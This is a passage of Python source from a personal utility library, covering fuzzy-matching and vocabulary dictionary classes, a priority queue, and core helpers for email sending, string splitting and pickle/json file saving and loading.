"""Flip trie from a prefix tree to a suffix tree or vice versa. This
intentionally creates a new object rather than operating in place.
Examples
--------
>>> pre_tree = Trie(['dog', 'cat', 'den', 'clean'], suffix=False)
>>> suff_tree = pre_tree.flip()
"""
return type(self)(self.values(), suffix=not self.suffix)
def __repr__(self):
# Display up to 5 values in repr.
vals = self.values()
if len(vals) > 5:
vals = '[' + ', '.join(repr(v) for v in vals[:5]) + ', ...]'
else:
vals = str(vals)
return f'{type(self).__name__}(values={vals}, suffix={self.suffix})'
class _FuzzyDictBase(dict):
"""Abstract base class for fuzzy key dictionaries.
Subclasses must define a method `similar` (see FuzzyKeyDict and LSHDict for
examples. See `__init_subclass__` for explanation of why we don't define
an abstractmethod here.
"""
def __getitem__(self, key):
try:
return super().__getitem__(key)
except KeyError:
return self.similar(key, mode='values', n_keys=1)[0]
def __init_subclass__(cls, **kwargs):
"""Can't use abstractmethod decorator because we're inheriting from
dict whose metaclass is not ABCMeta. Enforce this manually instead.
"""
super().__init_subclass__(**kwargs)
# Don't use inspect.ismethod because functions haven't been bound yet.
# Not perfect but good enough for this use case.
if not callable(getattr(cls, 'similar', None)):
raise TypeError('Children of _FuzzyDictBase must define method '
'`similar`.')
def _filter_similarity_pairs(self, pairs, mode='keys_values'):
"""
mode: str
Determines what information to return. In each case, items are
sorted in descending order of similarity.
- "keys_values": list of (key, value) tuples.
- "keys_similarities": list of (key, similarity) tuples.
- "keys_values_similarities": list of (key, value, similarity)
tuples.
- "keys": list of keys (strings).
- "values": list of values corresponding to the nearest keys (type
is dependent on what your dict values are).
"""
if mode == 'values':
return [self[p[0]] for p in pairs]
elif mode == 'keys_values':
return [(p[0], self[p[0]]) for p in pairs]
elif mode == 'keys_similarities':
return pairs
elif mode == 'keys':
return [p[0] for p in pairs]
elif mode == 'keys_values_similarities':
return [(p[0], self[p[0]], p[1]) for p in pairs]
else:
raise ValueError(
'Unrecognized value for `mode`. Should be one of ("values", '
'"keys", keys_values", "keys_similarities", or '
'"keys_values_similarities").'
)
class LSHDict(_FuzzyDictBase):
"""Dictionary that returns the value corresponding to a key's nearest
neighbor if the key isn't present in the dict. This is intended for use
as a word2index dict when using embeddings in deep learning: e.g. if we
have domain embeddings for the top 100k websites, some of our options for
dealing with unknown domains are:
1. Encode all of them as <UNK>. This loses a lot of information.
2. Create a FuzzyKeyDict which will search for similar keys using variants
of Levenshtein distance. Lookup is O(N) and for 100k domains, that comes
out to 0.6 seconds per item. We might have thousands or millions of
lookups over the course of training so this can be a significant cost.
3. Create an LSHDict (lookups are O(1)). Indexing into the dict as usual
(e.g. my_lsh_dict[key]) will provide the key's index if present and the
(approximate) nearest neighbor's index otherwise. Either way, the result
can be used to index into your embedding layer.
4. Create an LSHDict and use the `similar_values` method to return n>1
neighbors. Then pass their indices to an Embedding layer and
compute the sum/average/weighted average of the results. This may be
preferable to #3 cases such as web domain lookup, where similar URLs are
not guaranteed to represent similar sites. (This is basically
equivalent to an EmbeddingBag layer, but in torch that doesn't store
intermediate representations so we wouldn't be able to use our pretrained
embeddings.)
LSHDict does NOT support pickling as of version 6.0.6 (note: setitem seems
to be called before init when unpickling, meaning we try to access
self.forest in self._update_forest before it's been defined. Even if we
change setitem so reindexing does not occur by default, it still tries to
hash the new word and add it to the forest so unpickling will still fail).
"""
def __init__(self, data, n_candidates=None, n_keys=3, ngram_size=3,
scorer=fuzz.ratio, chunksize=100):
"""
Parameters
----------
data: dict or list[tuple]
The base dictionary. Unlike FuzzyKeyDict, we require this since
adding items one by one is computationally infeasible for large
datasets. Just build up your dictionary first.
n_candidates: int or None
Number of reasonably similar keys to retrieve when trying to index
in with a key that's missing (or when using the `similar` method).
You can override this in `similar` but not when using
__getitem__'s square bracket syntax. If not specified, this will
be auto initialized to vocab size/1,000, clipped to lie in
[20, 500]. See `similar` docstring for more on this.
n_keys: int
Default number of similar keys to retrieve in `similar`.
scorer: function
Default scoring function to use to narrow `n_candidates` keys down
to `n_keys`. Should be a fuzzywuzzy function where scores lie in
[0, 100] and higher values indicate high similarity.
chunksize: int
Determines how many items to send to each process when hashing
all the keys in the input data using multiprocessing. The default
should be fine in most cases.
"""
if len(data) < 10_000 and len(next(iter(data))) < 100:
warnings.warn(
'It looks like you\'re working with a relatively small '
'amount of data. FuzzyKeyDict may be fast enough for your '
'use case and would provide the set of strictly most similar '
'keys rather than an approximation of that set.'
)
super().__init__(data)
self.scorer = scorer
self.hash_word = partial(self.lsh_hash_word, n=ngram_size)
self.forest = MinHashLSHForest(num_perm=128)
self.chunksize = chunksize
self._initialize_forest()
# Datasketch's LSH implementation usually gives pretty decent results
# even with numbers as low as 5-10, but increasing that by a factor of
# 10 comes with minimal time cost: Fuzzywuzzy matching doesn't get
# particularly slow until we get into the thousands. The fact that
# we cap this at 500 makes this lookup asymptotically O(1) while
# FuzzyKeyDict's is O(N).
self.n_candidates = n_candidates or np.clip(len(self) // 1_000,
20, 500)
self.n_keys = n_keys
def __setitem__(self, key, val):
"""Try to add keys all at once in the constructor because adding new
keys can be extremely slow.
"""
super().__setitem__(key, val)
self._update_forest(key)
def _update_forest(self, key, index=True):
"""Used in __setitem__ to update our LSH Forest. Forest's index method
seems to recompute everything so adding items to a large LSHDict will
be incredibly slow. Luckily, our deep learning use case rarely/never
requires us to update object2index dicts after instantiation so that's
not as troubling as it might seem.
This used to be used by _initialize_forest as well but it didn't lend
itself to parallelization as well since it acts on a shared, existing
data structure.
Parameters
----------
key: str
index: bool
If True, reindex the forest (essentially making the key
queryable). This should be False when initializing the forest so
we just index once after everything's been added.
"""
self.forest.add(key, self.hash_word(key))
if index: self.forest.index()
def _initialize_forest(self):
"""Called once in __init__ to add all items to LSH Forest. This is
necessary because dict specifically calls its own __setitem__, not
its children's.
"""
hashes = parallelize(self.hash_word, self.keys(), total=len(self),
chunksize=self.chunksize)
for hash_, key in zip(hashes, self.keys()):
self.forest.add(key, hash_)
self.forest.index()
@add_docstring(_FuzzyDictBase._filter_similarity_pairs)
def similar(self, key, mode='keys_values', n_candidates=None,
n_keys=None, scorer=None):
"""Find a list of similar keys. This is used in __getitem__ but can
also be useful as a user-facing method if you want to get more than
1 neighbor or you want to get similarity scores as well.
Parameters
----------
key: str
Word/URL/etc. to find similar keys to.
mode: str
See section below `Returns`.
n_candidates: int or None
Number of similar candidates to retrieve. This uses Jaccard
Similarity which isn't always a great metric for string
similarity. This is also where the LSH comes in so they're not
strictly the n best candidates, but rather a close approximation
of that set. If None, this will fall back to self.n_candidates.
Keep in mind this determines how many keys to
n_keys: int or None
Number of similar keys to return. If None, this will fall back to
self.n_keys.
scorer: function or None
Fuzzywuzzy scoring function, e.g. fuzz.ratio or
fuzz.partial_ratio, which will be used to score each candidate and
select which to return. Higher scores indicate higher levels of
similarity. If None, this will fall back to self.scorer.
Returns
-------
list: List if `mode` is "keys" or "values". List of tuples otherwise.
"""
candidates = self.forest.query(self.hash_word(key),
n_candidates or self.n_candidates)
if not candidates: raise KeyError('No similar keys found.')
# List of (key, score) where higher means more similar.
pairs = process.extract(key, candidates,
limit=n_keys or self.n_keys,
scorer=scorer or self.scorer)
return self._filter_similarity_pairs(pairs, mode=mode)
@staticmethod
@add_docstring(ngrams)
def lsh_hash_word(word, num_perm=128, **ngram_kwargs):
"""Hash an input word (str) and return a MinHash object that can be
added to an LSHForest.
Parameters
----------
word: str
Word to hash.
num_perm: int
ngram_kwargs: any
Forwarded to `ngrams`.
Returns
-------
datasketch MinHash object
"""
mhash = MinHash(num_perm=num_perm)
for ng in ngrams(word, **ngram_kwargs):
mhash.update(ng.encode('utf8'))
return mhash
class FuzzyKeyDict(_FuzzyDictBase):
"""Dictionary that will try to find the most similar key if a key is
missing and return its corresponding value. This could be useful when
working with embeddings, where we could map missing items to the indices
of one or more existing embeddings.
Pickling seems to work but I would use this with caution.
TODO: consider desired behavior for comparing dict and FuzzyKeyDict with
the same keys/values. Currently return equal but I could see an argument
for either way, given that their type's behavior is rather different but
this is still a subclass of dict.
Examples
--------
d = FuzzyKeyDict(limit=3)
d['dog'] = 0
d['cat'] = 1
d['alley cat'] = 2
d['pig'] = 3
d['cow'] = 4
d['cowbell'] = 5
d['baby cow'] = 6
# Keys and similarity scores for the most similar keys.
>>> d.similar('house cat', mode='keys_similarities')
[('alley cat', 56), ('cat', 50), ('cowbell', 25)]
# "house cat" not in dict so we get the value for the most similar key.
>>> d['house cat']
2
# "cat" is in dict so __getitem__ functions like a regular dict.
>>> d['cat']
1
"""
def __init__(self, data=(), n_keys=3, scorer=fuzz.ratio):
"""
Parameters
----------
data: Iterable (optional)
Sequence of pairs, such as a dictionary or a list of tuples. If
provided, this will be used to populate the FuzzyKeyDict.
n_keys: int
Default number of similar keys to retrieve when using the
`similar` method.
scorer: function
Default scoring function to use to select the most similar keys in
`similar`. Should be a fuzzywuzzy function where scores lie in
[0, 100] and higher values indicate high similarity.
"""
super().__init__(data)
self.n_keys = n_keys
self.scorer = scorer
@add_docstring(_FuzzyDictBase._filter_similarity_pairs)
def similar(self, key, mode='keys_values', n_keys=None, scorer=None):
"""Find the keys in the dictionary that are most similar to the given
key and return some relevant information (the keys, their similarity
scores, their corresponding values, etc.) depending on what the user
specifies.
Parameters
----------
key: str
This can be present or missing from the dictionary, though in
practice it's often more useful when it's missing. We'll search
the existing keys and find the strings that are most similar.
mode: str
See section below `Returns`.
n_keys: int or None
Number of similar keys to return. If None, this will fall back to
self.n_keys.
scorer: function or None
Fuzzywuzzy scoring function, e.g. fuzz.ratio or
fuzz.partial_ratio, which will be used to score each candidate and
select which to return. Higher scores indicate higher levels of
similarity. If None, this will fall back to self.scorer.
Returns
-------
list: List if `mode` is "keys" or "values". List of tuples otherwise.
"""
pairs = process.extract(key,
self.keys(),
limit=n_keys or self.n_keys,
scorer=scorer or self.scorer)
return self._filter_similarity_pairs(pairs, mode=mode)
class DotDict(dict):
"""Dictionary that allows use of dot notation as well as bracket notation.
This should be picklable starting in htools>=6.0.6.
"""
def __getattr__(self, k):
return self[k]
def __setattr__(self, k, v):
self[k] = v
def __delattr__(self, k):
del self[k]
def __getstate__(self):
"""We often have to use `__reduce__` to make dict subclasses picklable
but this seems to work in this case, I think because we don't have any
required arguments to __init__.
"""
return dict(self)
def __setstate__(self, data):
self.update(data)
def __dir__(self):
return self.keys()
class PriorityQueue:
"""Creates list-like object that lets us retrieve the next item to process
based on some priority measure, where larger priority values get processed
first. This should be picklable.
"""
def __init__(self, items=None):
"""
Parameters
----------
items: list[tuple[any, numbers.Real]]
Each tuple must be structured as (item, priority) where a larger
priority means that item will be processed sooner.
"""
self._items = []
if items:
for item, priority in items:
self.put(item, priority)
def put(self, item, priority):
# Negate priority because package only provides min heap.
heappush(self._items, (-priority, item))
def pop(self):
try:
return heappop(self._items)[-1]
except IndexError:
# The actual index error occurs due to the [-1] performed after
# heappop, so we rewrite the error message to be more useful.
raise IndexError('pop from empty queue')
def __iter__(self):
return self
def __next__(self):
"""Makes PriorityQueue iterable, but note that this is a destructive
action: our queue will be empty if we iterate over it
(e.g. `for item in queue: pass`). Numeric indexing is not allowed
since heapq only guarantees that the first item we retrieve will be
the next one - it does not let us select the 3rd in line, for
instance.
"""
try:
return self.pop()
except IndexError:
raise StopIteration
def __contains__(self, key):
return key in (item for priority, item in self._items)
def __repr__(self):
return f'{func_name(type(self))}({self._items})'
class VocabDict(dict):
"""Convenient interface for working with vocabularies where we want to map
from word -> index and from index -> word. Note that item deletion is not
supported, nor is changing the index of a key already in the dict.
The typical use case only involves creating the object once and leaving it.
Examples
--------
>>> w2i = {'the': 0, 'I': 1, 'door': 2, 'ocotopus': 3}
>>> vocab = VocabDict(w2i)
>>> vocab['door']
2
>>> vocab[2]
'door'
>>> vocab[[3, 0, 1]]
['octopus', 'the', 'I']
>>> vocab['I', 2]
[1, 'door]
"""
def __init__(self, w2i):
"""
Parameters
----------
w2i: Mapping[str, int]
Maps strings to numeric indices.
Ex: {'a': 0, 'the': 1, ... 'ostrich': 100}. Indices must be
consecutive and zero-indexed, though we don't force you to sort
this before calling the constructor.
"""
if sorted(w2i.values()) != list(range(max(w2i.values()) + 1)):
raise ValueError(
'w2i indices must be consecutive and zero-indexed.')
# It's nice for the dict to be ordered appropriately, and we need to
# sort anyway to ensure i2w is in the correct order.
w2i = dict(sorted(w2i.items(), key=lambda x: x[1]))
super().__init__(w2i)
self.i2w = list(w2i)
@dispatch(Integral)
def __getitem__(self, i):
return self.i2w[i]
@dispatch(str)
def __getitem__(self, key):
return super().__getitem__(key)
@dispatch(Iterable)
def __getitem__(self, vals):
return [self[v] for v in vals]
def __setitem__(self, key, i):
if not isinstance(key, str):
raise TypeError(f'key must have type str, not {type(key)}.')
if not isinstance(i, int):
raise TypeError(f'i must have type int, not {type(i)}.')
if key in self:
raise ValueError(
f'Key {repr(key)} is already in {type(self).__name__}.')
if i != len(self):
raise ValueError(
f'Invalid value i={repr(i)}. Should be {len(self)} '
'because indices must be consecutive.')
super().__setitem__(key, i)
self.i2w.append(key)
def __delitem__(self, key):
raise RuntimeError(
f'{type(self).__name__} does not support item deletion.')
@classmethod
def fromkeys(cls, keys):
return cls({k: i for i, k in enumerate(keys)})
def setdefault(self, key, default):
raise RuntimeError(
f'setdefault method not supported for {type(self).__name__}.')
class IndexedDict(OrderedDict):
"""OrderedDict that lets us use integer indices. The tradeoff is that we
can no longer use integers as keys since that would make it ambiguous
whether we were trying to index in with a key or a positional index.
This should be picklable.
"""
def __init__(self, data=None):
# Argument must be iterable.
super().__init__(data or {})
def __setitem__(self, key, val):
if isinstance(key, int):
raise TypeError('`key` must not be an integer.')
super().__setitem__(key, val)
def __getitem__(self, key):
if isinstance(key, int):
return list(self.values())[key]
return super().__getitem__(key)
class LambdaDict(dict):
"""Create a default dict where the default function can accept parameters.
Whereas the defaultdict in Collections can set the default as int or list,
here we can pass in any function where the key is the parameter.
"""
def __init__(self, default_function):
"""
Parameters
----------
default_function: function
When referencing a key in a LambdaDict object that has not been
added yet, the value will be the output of this function called
with the key passed in as an argument.
"""
super().__init__()
self.f = default_function
def __missing__(self, key):
self[key] = self.f(key)
return self[key]
class Results:
"""Experimenting with ways to address a few shortcomings of Args and
DotDict, so there's some redundancy here.
1. IIRC Args is impossible to pickle, I think do some hacky naming choices
by me. Though I vaguely recall namedtuple itself may have similar problems
so that might have happened anyway.
2. DotDict addresses #1 (you do of course need to import htools to load
it, but I always have it imported anyway), but does not support tuple-style
unpacking.
But basically this is meant to be a simple way to return data from a
function, optionally pickle it, and conveniently load it again.
"""
def __init__(self, **kwargs):
for x in ('items', 'keys', 'values', '_keys', '_asdict', 'from_dict'):
if x in kwargs:
raise ValueError(f'{x!r} is a reserved attribute name.')
self._keys = list(kwargs)
self.__dict__.update(kwargs)
@classmethod
def from_dict(cls, data):
return cls(**data)
def __repr__(self):
arg_strs = ", ".join(f'{k}={v!r}' for k, v in self.items())
return f'{type(self).__name__}({arg_strs})'
def __iter__(self):
"""Unlike dict, iterate over values because this is still closer to a
tuple at heart. Keys are honestly more like documentation here.
"""
yield from self.values()
def __len__(self):
return len(self._keys)
def __getitem__(self, i:int):
"""Notice this accepts an integer index and returns a value, NOT a key.
This is because I'd like to be able to unpack this like a tuple rather
than a dict.
"""
keys = self._keys[i]
if listlike(keys):
return type(self)(**{key: getattr(self, key) for key in keys})
return getattr(self, keys)
def __getstate__(self):
return select(vars(self), drop=['keys'])
def __setstate__(self, data):
self._keys = []
for k, v in data.items():
self._keys.append(k)
self.__dict__[k] = v
def __eq__(self, o2):
return vars(self) == vars(o2)
def items(self):
return self._asdict().items()
def keys(self):
return self._asdict().keys()
def values(self):
return self._asdict().values()
def _asdict(self):
"""Matches namedtuple interface. Also, we can't call dict directly
because __getitem__ works differently than a dict so we get an error.
"""
return select(vars(self), keep=self._keys)
| {"/htools/magics.py": ["/htools/meta.py"], "/htools/meta.py": ["/htools/core.py", "/htools/config.py"], "/htools/__init__.py": ["/htools/core.py", "/htools/meta.py", "/htools/structures.py"], "/notebooks/scratch_trie_with_attrs.py": ["/htools/core.py"], "/htools/structures.py": ["/htools/core.py", "/htools/meta.py"], "/htools/core.py": ["/htools/config.py"], "/htools/cli.py": ["/htools/core.py", "/htools/meta.py"], "/htools/autodebug.py": ["/htools/meta.py"], "/htools/pd_tools.py": ["/htools/core.py", "/htools/__init__.py"]} |
78,152 | hdmamin/htools | refs/heads/master | /htools/core.py | from bz2 import BZ2File
from collections import Counter, Sequence, Iterable, \
Mapping
from functools import partial
import gc
from email.mime.image import MIMEImage
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email import encoders
from inspect import signature, getattr_static, ismethod, getmembers, getmodule
from itertools import chain
import json
import mimetypes
from multiprocessing import Pool
import os
from pathlib import Path
import pickle
from random import choice, choices
import re
import smtplib
from string import ascii_letters
from subprocess import run, check_output
import sys
import time
from tqdm.auto import tqdm
import warnings
import wordninja as wn
from htools.config import get_credentials, get_default_user
class InvalidArgumentError(Exception):
pass
def hdir(obj, magics=False, internals=False):
"""Print object methods and attributes, by default excluding magic methods.
Parameters
-----------
obj: any type
The object to print methods and attributes for.
magics: bool
Specifies whether to include magic methods (e.g. __name__, __hash__).
Default False.
internals: bool
Specifies whether to include internal methods (e.g. _dfs, _name).
Default False.
Returns
--------
dict
Keys are method/attribute names, values are strings specifying whether
the corresponding key is a 'method' or an 'attr'.
"""
output = dict()
for attr in dir(obj):
# Exclude magics or internals if specified.
if (not magics and attr.startswith('__')) or \
(not internals and re.match('_[^_]', attr)):
continue
# Handle rare case where attr can't be invoked (e.g. df.sparse on a
# non-sparse Pandas dataframe).
try:
is_method = callable(getattr(obj, attr))
except Exception:
continue
# Update output to specify whether attr is callable.
if is_method:
output[attr] = 'method'
else:
output[attr] = 'attribute'
return output
def tdir(obj, **kwargs):
"""A variation of the built in `dir` function that shows the
attribute names as well as their types. Methods are excluded as they can
change the object's state.
Parameters
----------
obj: any type
The object to examine.
kwargs: bool
Additional arguments to be passed to hdir. Options are `magics` and
`internals`. See hdir documentation for more information.
Returns
-------
dict[str, type]: Dictionary mapping the name of the object's attributes to
the corresponding types of those attributes.
"""
return {k: type(getattr(obj, k))
for k, v in hdir(obj, **kwargs).items() if v == 'attribute'}
def hasarg(func, arg):
"""Checks if a function has a given argument. Works with args and kwargs as
well if you exclude the stars. See example below.
Parameters
----------
func: function
arg: str
Name of argument to look for.
Returns
-------
bool
Example
-------
def foo(a, b=6, *args):
return
>>> hasarg(foo, 'b')
True
>>> hasarg(foo, 'args')
True
>>> hasarg(foo, 'c')
False
"""
return arg in signature(func).parameters
def quickmail(subject, message, to_email, from_email=None,
attach_paths=(), verbose=True, password=None):
"""Send an email.
Parameters
-----------
subject: str
Subject line of email.
message: str
Body of email.
to_email: str
Recipient's email. This can also be a verizon phone number in the form
3332221111@vtext.com (notice no extra leading 1), in which case this
will send an sms. In theory, you should be able to send mms
(i.e. include image(s)) by using a format like 3332221111@vzwtext.com,
but this doesn't seem to be working as of 2/10/22.
from_email: str
Gmail address being used to send email.
attach_paths: str or listlike
Paths to files to attach. Currently supports text (.txt, .md, etc.;
as of 2/11/22, gmail blocks executable attachments like .py)
and image (.jpg, .png, etc.) files.
Returns
--------
None
"""
# Load email username. Error handling takes place in config functions.
from_email = from_email or get_default_user()
if not from_email: return None
# Load email password.
password = password or get_credentials(from_email)
if not password: return None
# Create message and add text if specified.
msg = MIMEMultipart()
msg['Subject'] = subject
msg['From'] = from_email
msg['To'] = to_email
if message: msg.attach(MIMEText(message))
# Load and attach file(s). Paths must be strings, not Paths, for mimetypes.
for path in map(str, tolist(attach_paths)):
ftype = mimetypes.guess_type(path)[0].split('/')[0]
if ftype == 'text':
mime_cls = MIMEText
mode = 'r'
encoder = identity
kwargs = {}
elif ftype == 'image':
mime_cls = MIMEImage
mode = 'rb'
encoder = encoders.encode_base64
kwargs = {'name': os.path.basename(path)}
else:
raise ValueError('Attached file should be a text or image file. '
f'We parsed your file as type {ftype}.')
with open(path, mode) as f:
attachment = mime_cls(f.read(), **kwargs)
# show up as an attachment rather than an embedded object, but
# sometimes the later might be preferable.
attachment.add_header('Content-Disposition', 'attachment',
filename=os.path.basename(path))
encoder(attachment)
msg.attach(attachment)
# Access server and send email.
hosts = {'gmail.com': 'smtp.gmail.com',
'outlook.com': 'smtp-mail.outlook.com'}
try:
host = hosts[from_email.split('@')[-1]]
except KeyError:
raise ValueError(f'Unrecognized host {from_email.split("@")[-1]}. '
f'We currently support {hosts.keys()}.')
server = smtplib.SMTP(host=host, port=587)
server.starttls()
server.login(user=from_email, password=password)
server.sendmail(from_email, to_email, msg.as_string())
if verbose: print(f'Email sent to {to_email}.')
def hsplit(text, sep, group=True, attach=True):
"""Flexible string splitting that retains the delimiter rather, unlike
the built-in str.split() method.
NOTE: I recently observed behavior suggesting separators with special
characters (e.g. "\n") may not work as expected for some settings. It
should work when group=True and attach=True though since I rewrote that
with new logic without the re module.
Parameters
-----------
text: str
The input text to be split.
sep: str
The delimiter to be split on.
group: bool
Specifies whether to group consecutive delimiters together (True),
or to separate them (False).
attach: bool
Specifies whether to attach the delimiter to the string that preceeds
it (True), or to detach it so it appears in the output list as its own
item (False).
Returns
--------
list[str]
Examples
---------
text = "Score -- Giants win 6-5"
sep = '-'
# Case 0.1: Delimiters are grouped together and attached to the preceding
word.
>> hsplit(text, sep, group=True, attach=True)
>> ['Score --', ' Giants win 6-', '5']
# Case 0.2: Delimiters are grouped together but are detached from the
preceding word, instead appearing as their own item in the output list.
>> hsplit(text, sep, group=True, attach=False)
>> ['Score ', '--', ' Giants win 6', '-', '5']
Case 1.1: Delimiters are retained and attached to the preceding string.
If the delimiter occurs multiple times consecutively, only the first
occurrence is attached, and the rest appear as individual items in the
output list.
>> hsplit(text, sep, group=False, attach=True)
>> ['Score -', '-', ' Giants win 6-', '5']
# Case 1.2: Delimiters are retained but are detached from the preceding
string. Each instance appears as its own item in the output list.
>> hsplit(text, sep, group=False, attach=False)
>> ['Score ', '-', '-', ' Giants win 6', '-', '5']
"""
sep_re = re.escape(sep)
regex = f'[^{sep_re}]*{sep_re}*'
##########################################################################
# Case 0: Consecutive delimiters are grouped together.
##########################################################################
if group:
# Subcase 0.1
if attach:
return _grouped_split(text, sep)
# Subcase 0.2
else:
return [word for word in re.split(f'({sep_re}+)', text) if word]
##########################################################################
# Case 1: Consecutive delimiters are NOT grouped together.
##########################################################################
words = text.split(sep)
# Subcase 1.1
if attach:
return [word for word in re.findall(regex[:-1]+'?', text) if word]
# Subcase 1.2
return [word for word in chain(*zip(words, [sep]*len(words))) if word][:-1]
def _grouped_split(text, sep):
"""Hsplit helper for case where group=True and attach=True (see hsplit
docs). Old re.find() method didn't work right when sep had special
characters (e.g. "\n").
"""
res = []
toks = text.split(sep)
max_idx = len(toks) - 1
for i, tok in enumerate(toks):
if tok:
if i < max_idx: tok += sep
res.append(tok)
elif i < max_idx:
if res:
res[-1] += sep
else:
res.append(sep)
return res
def rmvars(*args):
"""Wrapper to quickly free up memory by deleting global variables. Htools
3.0 does not provide a way to do this for local variables.
Parameters
----------
args: str
One or more variable names to delete. Do not pass in the variable
itself.
Returns
-------
None
"""
for arg in args:
del globals()[arg]
gc.collect()
def print_object_sizes(space, limit=None, exclude_underscore=True):
"""Print the object names and sizes of the currently defined objects.
Parameters
-----------
space: dict
locals(), globals(), or vars()
limit: int or None
Optionally limit the number of objects displayed (default None for no
limit).
exclude_underscore: bool
Determine whether to exclude objects whose names start with an
underscore (default True).
"""
var_size = [(var, sys.getsizeof(obj)) for var, obj in space.items()]
for var, size in sorted(var_size, key=lambda x: -x[1])[:limit]:
if not var.startswith('_') or not exclude_underscore:
print(var, size)
def eprint(arr, indent=2, spacing=1):
"""Enumerated print. Prints an iterable with one item per line accompanied
by a number specifying its index in the iterable.
Parameters
-----------
arr: iterable
The object to be iterated over.
indent: int
Width to assign to column of integer indices. Default is 2, meaning
columns will line up as long as <100 items are being printed, which is
the expected use case.
spacing: int
Line spacing. Default of 1 will print each item on a new line with no
blank lines in between. Spacing of 2 will double space output, and so
on for larger values.
Returns
--------
None
"""
for i, x in enumerate(arr):
print(f'{i:>{indent}}: {x}', end='\n'*spacing)
def _read_write_args(path, mode):
"""Helper for `save` and `load` functions.
Parameters
----------
path: str
Path to read/write object from/to.
mode: str
'w' for writing files (as in `save`), 'r' for reading files
(as in `load`).
Returns
-------
tuple: Function to open file, mode to open file with (str), object to open
file with.
"""
ext = path.rpartition('.')[-1]
# Store in dict to make it easier to add additional formats in future.
ext2data = {
'json': (open, '', json),
'pkl': (open, 'b', pickle),
'zip': (BZ2File, '', pickle),
}
if ext not in ext2data:
raise InvalidArgumentError(
'Invalid extension. Make sure your filename ends with '
'.json, .pkl, or .zip.'
)
opener, mode_suffix, saver = ext2data[ext]
return opener, mode + mode_suffix, saver
def save(obj, path, mode_pre='w', verbose=True):
"""Wrapper to save data as text, pickle (optionally zipped), or json.
Parameters
-----------
obj: any
Object to save. This will be pickled/jsonified/zipped inside the
function - do not convert it before-hand.
path: str
File name to save object to. Should end with .txt, .sh, md, .pkl, .zip,
or .json depending on desired output format. If .zip is used, object
will be zipped and then pickled. (.sh and .md will be treated
identically to .txt.)
mode_pre: str
Determines whether to write or append text. One of ('w', 'a').
verbose: bool
If True, print a message confirming that the data was pickled, along
with its path.
Returns
-------
None
"""
path = Path(path)
os.makedirs(path.parent, exist_ok=True)
if verbose: print(f'Writing data to {path}.')
if path.suffix[1:] in ('txt', 'sh', 'md', 'py'):
with path.open(mode_pre) as f:
f.write(obj)
else:
opener, mode, saver = _read_write_args(str(path), mode_pre)
with opener(path, mode) as f:
saver.dump(obj, f)
def load(path, verbose=True):
"""Wrapper to load text files or pickled (optionally zipped) or json data.
Parameters
----------
path : str
File to load. File type will be inferred from extension. Must be one of
'.txt', '.sh', 'md', '.json', '.pkl', or '.zip'.
verbose : bool, optional
If True, will print message stating where object was loaded from.
Returns
-------
object: The Python object that was pickled to the specified file.
"""
path = Path(path)
if path.suffix[1:] in ('txt', 'sh', 'md', 'py'):
return path.read_text()
opener, mode, saver = _read_write_args(str(path), 'r')
with opener(path, mode) as f:
data = saver.load(f)
if verbose: print(f'Object loaded from {path}.')
return data
def dict_sum(*args):
"""Given two or more dictionaries with numeric values, combine them into a
single dictionary. For keys that appear in multiple dictionaries, their
corresponding values are added to produce the new value.
This differs from combining two dictionaries in the following manner:
{**d1, **d2}
The method shown above will combine the keys but will retain the value
from d2, rather than adding the values from d1 and d2.
Parameters
-----------
*args: dicts
2 or more dictionaries with numeric values.
Returns
--------
dict: Contains all keys which appear in any of the dictionaries that are
passed in. The corresponding values from each dictionary containing a
given key are summed to produce the new value.
Examples
---------
>>> d1 = {'a': 1, 'b': 2, 'c': 3}
>>> d2 = {'a': 10, 'c': -20, 'd': 30}
>>> d3 = {'c': 10, 'd': 5, 'e': 0}
>>> dict_sum(d1, d2)
{'a': 11, 'b': 2, 'c': -7, 'd': 35, 'e': 0}
"""
keys = {key for d in args for key in d.keys()}
return {key: sum(d.get(key, 0) for d in args)
for key in keys}
def _select_mapping(items, keep=(), drop=()):
"""Helper function for `select`.
Parameters
----------
items: Mapping
Dict (or similar mapping) to select/drop from.
keep: Iterable[str]
Sequence of keys to keep.
drop: Iterable[str]
Sequence of keys to drop. You should specify either `keep` or `drop`,
not both.
Returns
-------
Dict
"""
if keep:
return {k: items[k] for k in keep}
return {k: v for k, v in items.items() if k not in set(drop)}
def _select_sequence(items, keep=(), drop=()):
"""Helper function for `select` that works on sequences (basically
collections that support enumeration).
Parameters
----------
items: Sequence
List, tuple, or iterable sequence of some sort to select items from.
keep: Iterable[str]
Sequence of indices to keep.
drop: Iterable[str]
Sequence of indices to drop. You should specify either `keep` or
`drop`, not both.
Returns
-------
Same type as `items` (usually a list or tuple).
"""
type_ = type(items)
if keep:
return type_(x for i, x in enumerate(items) if i in set(keep))
return type_(x for i, x in enumerate(items) if i not in set(drop))
def select(items, keep=(), drop=()):
"""Select a subset of a data structure. When used on a mapping (e.g. dict),
you can specify a list of keys to include or exclude. When used on a
sequence like a list or tuple, specify indices instead of keys.
Parameters
----------
items: abc.Sequence or abc.Mapping
The dictionary to select items from.
keep: Iterable[str]
Sequence of keys to keep.
drop: Iterable[str]
Sequence of keys to drop. You should specify either `keep` or `drop`,
not both.
Returns
-------
dict: Dictionary containing only the specified keys (when passing in
`keep`), or all keys except the specified ones (when passing in
`drop`).
"""
if bool(keep) + bool(drop) != 1:
raise InvalidArgumentError('Specify exactly one of `keep` or `drop`.')
if isinstance(items, Mapping):
return _select_mapping(items, keep, drop)
elif isinstance(items, Sequence):
return _select_sequence(items, keep, drop)
else:
raise InvalidArgumentError('`items` must be a Mapping or Sequence.')
def differences(obj1, obj2, methods=False, **kwargs):
"""Find the differences between two objects (generally of the same type -
technically this isn't enforced but we do require that the objects have
the same set of attribute names so a similar effect is achieved. Actual
type checking was causing problems comparing multiple Args instances,
presumably because each Args object is defined when called).
This is a way to get more detail beyond whether two objects are equal or
not.
Parameters
-----------
obj1: any
An object.
obj2: any, usually the same type as obj1
An object.
methods: bool
If True, include methods in the comparison. If False, only attributes
will be compared. Note that the output may not be particularly
interpretable when using method=True; for instance when comparing two
strings consisting of different characters, we get a lot of output
that looks like this:
{'islower': (<function str.islower()>, <function str.islower()>),
'isupper': (<function str.isupper()>, <function str.isupper()>),...
'istitle': (<function str.istitle()>, <function str.istitle()>)}
These attributes all reflect the same difference: if obj1 is 'abc'
and obj2 is 'def', then
'abc' != 'def' and
'ABC' != 'DEF' abd
'Abc' != 'Def'.
When method=False, we ignore all of these, such that
differences('a', 'b') returns {}. Therefore, it is important to
carefully consider what differences you care about identifying.
**kwargs: bool
